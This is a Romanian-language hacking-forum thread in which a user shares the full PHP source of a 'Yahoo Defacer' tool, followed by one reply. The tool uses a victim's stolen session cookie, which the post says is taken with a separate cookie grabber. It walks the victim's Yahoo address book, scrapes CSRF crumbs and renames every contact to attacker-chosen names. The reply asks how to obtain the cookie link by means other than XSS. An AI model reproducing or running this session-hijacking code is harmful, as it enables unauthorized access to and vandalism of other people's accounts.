Jump to content
AhEaD

[RST] Yahoo Messenger Defacer Tool

By AhEaD, in Proiecte RST

Recommended Posts

AhEaD Newbie

AhEaD

Posted
Posted

Scripting si idee: AhEaD

Corectarea erorilor de rigoare: Kenpachi ( "special thanks" )

Folosire:

- Necesita RST Profesional Cookie Grabber.

3 fielduri:

1.Cookie - Linkul de logare din "RST Professional Cookie Grabber"

2. si 3. Numele cu care sa fie modificata lista victimei.

POC:

aftergi4.jpg

<title>Yahoo Defacer - Rstcenter.com [ AhEaD ]</title>
<style type="text/css">
<!--
body,td,th {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 10px;
	color: #99FF00;
}
body {
	background-color: #000000;
}
.smecleu2 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 10px;
	font-style: normal;
	background-color: #000000;
	border: thin inset #99FF00;
	color: #99FF00;
}
-->
</style>
Yahoo Defacer - Rstcenter.com [ AhEaD ] <br />
<br />
Cookie:
<input type="text" name="url" class="smecleu2" value="<?php echo $url ?>"><br /><br />
  Fname:<input type="text" name="fname" class="smecleu2" value="<?php echo $fname ?>"><br />
  Lname:<input type="text" name="lname" class="smecleu2" value="<?php echo $lname ?>"><br />
  <input type="hidden" name="action" value="send">
  </p>
</p>
<p>
  <input name="submit" type="submit" class="smecleu2" value="Deles">

<p><?php

set_time_limit(0);
ignore_user_abort(1);
ini_set("memory_limit", "64M");

$url = $_POST['url'];
$fname = urlencode($_POST['fname']);
$lname = urlencode($_POST['lname']);

$useragent  = "YahooSeeker-Testing/v3.9 (compatible; Mozilla 4.0; MSIE 5.5; http://search.yahoo.com/)";
if ($action=="send"){

$ch = curl_init(); 
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_REFERER, "http://mail.yahoo.com");   
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
curl_setopt ($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
ob_start();     
curl_exec ($ch);
ob_end_clean(); 
curl_close ($ch);
unset($ch);

function curl($url) {
	$rand = rand(100000,400000);
	$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/".$rand." Netscape/7.1 (ax)";
	$ch = curl_init(); 
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_USERAGENT, $agent);
	curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
	$result = curl_exec ($ch);
	return $result;
	curl_close ($ch);
}

function curl2($url2, $post) {
	$rand = rand(100000,400000);
	$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/".$rand." Netscape/7.1 (ax)";
	$ch = curl_init(); 
	curl_setopt($ch, CURLOPT_URL, $url2);
	curl_setopt($ch, CURLOPT_REFERER, $ref);  
	curl_setopt($ch, CURLOPT_USERAGENT, $agent);
	curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
	curl_setopt($ch, CURLOPT_POST, 1); 
	$result = curl_exec ($ch);
	return $result;
	curl_close ($ch);
}

function parsepage($get){
	$ext = explode('name="crumb_value" value="', $get);
	$ext = explode('"/>', $ext[1]);

	if($ext[0] !== ''){
	//echo $ext[0].'<br>';
	}
	flush();

	return $ext[0];

}
function parsepage3($get){
	$ext3 = explode("$id".'&', $get);
	$ext3 = explode('"/>', $ext3[1]);

	if($ext3[0] !== ''){
	}
	flush();

	return $ext3[0];

}



for($a=1;$a<30;$a++){
	$url = 'http://intl.m.yahoo.com/p/addressbook/Listing?page='.$a;
	$get = curl($url);

	$yid = explode('/p/addressbook/Details?id=', $get);
	$nr = count($yid);
	$nr2 = $nr - 1;
	for($j=1;$j<$nr;$j++){
		$id = explode('&amp', $yid[$j]);
		$id = $id[0].'';
		//echo $id.'<br>';
		echo $id;

		$urlmod = 'http://intl.m.yahoo.com/p/addressbook/EditPropertyForm?property=name&id=';
		$get = curl($urlmod);
		$rez = parsepage($get);///crumb
		$rez = urlencode($rez);

		$ref = 'http://intl.m.yahoo.com/p/addressbook/EditPropertyForm?property=name&id='.$id;//."&".$pizda;
		//echo $ref;

		$url2 = 'http://intl.m.yahoo.com/p/addressbook/EditCompleted';
		$post = 'fn='.$fname.'&ln='.$lname.'&nn=&id='.$id.'&function=editing&Save=Save&Cancel=Cancel&sub_function=name&crumb_value='.$rez.'&display_name=AhEaD&name=Save';
		//echo "<br>".$post;

		$daiiiiii = curl2($url2, $post);
		echo $daiiiiii;
		//echo "  Editing was successful ... continuing <br>";

		flush();
		}
if($nr<2){$a = 100;}
	}

echo "DONE !!!!!!!";
}

?>

  • Downvote 5
devianc3 Newbie

devianc3

Posted
Posted

Poate sa-mi dea cineva un exemplu de cum trebuie sa arate linkul ce trebuie bagat in textbox la script?.. Cel de pe cookie grabber?.. pt ca eu s-ar putea sa am alte metode de racolare a cookie-urilor, ne-folosind xss. Would appreciate it;)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...